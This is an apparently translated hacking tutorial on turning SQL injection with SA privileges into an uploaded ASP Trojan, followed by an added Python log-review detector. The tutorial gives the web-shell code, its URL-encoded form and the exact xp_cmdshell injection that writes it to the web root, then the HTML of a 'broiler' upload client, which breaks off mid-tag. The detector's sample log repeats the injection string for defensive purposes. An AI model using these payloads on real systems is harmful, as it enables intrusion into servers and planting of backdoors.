SQL injection with ASP Trojans

xiaoxiao, 2021-03-06

This article applies to SQL Server databases where the injection runs with SA privileges and the server supports FSO (FileSystemObject) in ASP. How to upload a Trojan through such a SQL injection has always been something of a headache; here is another way to upload one.

1. During the SQL injection, use xp_cmdshell to write to the server an ASP file that can itself write files.

Contents of the file:

    <%
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    Set objCountFile = objFSO.CreateTextFile(request("mypath"), True)
    objCountFile.Write request("mydata")
    objCountFile.Close
    %>

The file can be written on a single line:

    <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject"):Set objCountFile = objFSO.CreateTextFile(request("mypath"), True):objCountFile.Write request("mydata"):objCountFile.Close%>

Encoding the special characters gives:

    %3C%25Set%20objFSO%20=%20Server.CreateObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.CreateTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E

Injection (here the web directory is c:/inetpub/wwwroot/):

    exec master..xp_cmdshell 'echo "%3C%25Set%20objFSO%20=%20Server.CreateObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.CreateTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E" > c:/inetpub/wwwroot/ftp.asp';

This generates an ftp.asp file in the server's web directory, containing the code:

    <%
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    Set objCountFile = objFSO.CreateTextFile(request("mypath"), True)
    objCountFile.Write request("mydata")
    objCountFile.Close
    %>

You can see that the code above has two interfaces, mypath and mydata: mypath is the path of the file to generate on the next submission, and mydata is the content of that file. The file contents are entered in a local document, RohuClient.htm, whose code is as follows:

    <head>
    <title>broiler file generator - client production: absolute zero QQ: 12216796</title>
    <style type="text/css">
    <!--
    line-height: 150%}
    body {font-size: 12px; font-family: Verdana, Arial, Helvetica, Sans-Serif, Song; scrollbar-face-color: #eeeeee; scrollbar-highlight-color: #ffffff; scrollbar-shadow-color: #dee3e7; scrollbar-3dlight-color: #d1d7dc; scrollbar-arrow-color: #006699; scrollbar-track-color: #ededed; scrollbar-darkshadow-color: #98aab1}
    a:link {font-size: 9pt; color: #363636; line-height: 18px; text-decoration: none}
    a:visited {font-size: 9pt; color: #363636; line-height: 18px; text-decoration: none}
    a:hover {color: #cc0000; line-height: 18px; text-decoration: underline}
    input, select, textarea {font-family: "Tahoma", "Arial", "Helvetica", "Sans-Serif", "Song"; background-color: #f9f9f9; font-size: 9pt; border: 1px #d2d2d2 double; line-height: 120%;}
    -->
    </style>
    </head>
    <script language="javascript" type="text/javascript">
    function Chk(theform) {
      if (theform.ftpurl.value == '') {
        alert('Please enter the address to submit to!');
        theform.ftpurl.focus();
        return false;
      }
      if (theform.mypath.value == '') {
        alert('Please enter the location of the generated file!');
        theform.mypath.focus();
        return false;
      }
      if (theform.mydata.value == '') {
        alert('Please enter the content of the generated file!');
        theform.mydata.focus();
        return false;
      }
      theform.action = theform.ftpurl.value;
    }
    </script>
    <body>
    <form name="RohuForm" method="post" action="" onSubmit="return Chk(this)" target="_blank">
    <table width="673" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
    <td width="
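Added example, not part of the original article: a log-review sketch that flags the two stages described above (an xp_cmdshell call that redirects script into a web-served .asp file, then later requests to that file) in constructed IIS-style log lines. The log layout, the /news.asp page and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C-style lines: date time method uri-stem uri-query status.
# The script body is elided ("...") on purpose; the detector does not need it.
SAMPLE_LOG = """\
2021-03-06 10:00:01 GET /news.asp id=12 200
2021-03-06 10:02:17 GET /news.asp id=12;exec%20master..xp_cmdshell%20'echo%20%22%3C%25...%25%3E%22%20>%20c:/inetpub/wwwroot/ftp.asp';-- 200
2021-03-06 10:03:40 POST /ftp.asp - 200
2021-03-06 10:05:02 GET /index.asp - 200
"""

CMDSHELL = re.compile(r"xp_cmdshell", re.I)
# Shell redirect into a server-side script file, e.g.  > c:/inetpub/wwwroot/x.asp
REDIRECT = re.compile(r">\s*\"?([a-z]:[\\/][^\s'\";]*\.(?:aspx?|asa))", re.I)

def decode(query, rounds=3):
    """Percent-decode a bounded number of times so double encoding is still seen."""
    for _ in range(rounds):
        nxt = unquote(query)
        if nxt == query:
            break
        query = nxt
    return query

def parse(log_text):
    """Yield (timestamp, method, stem, decoded_query) for well-formed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) == 6:
            yield f"{parts[0]} {parts[1]}", parts[2], parts[3], decode(parts[4])

def find_drops(log_text):
    """Stage 1: a query that calls xp_cmdshell and writes or embeds ASP script."""
    hits = []
    for when, _method, stem, query in parse(log_text):
        target = REDIRECT.search(query)
        if CMDSHELL.search(query) and (target or "<%" in query):
            name = re.split(r"[\\/]", target.group(1))[-1].lower() if target else None
            hits.append({"when": when, "injected_page": stem, "dropped": name})
    return hits

def follow_ups(log_text, drop):
    """Stage 2: later requests to the dropped file (the mypath/mydata POSTs)."""
    return [(when, method, stem) for when, method, stem, _q in parse(log_text)
            if drop["dropped"] and when > drop["when"]
            and stem.lower().rsplit("/", 1)[-1] == drop["dropped"]]
```

The two preconditions the article names, an application login with SA rights and a usable xp_cmdshell, are also the settings to take away: a least-privilege database login and xp_cmdshell left disabled stop the first stage.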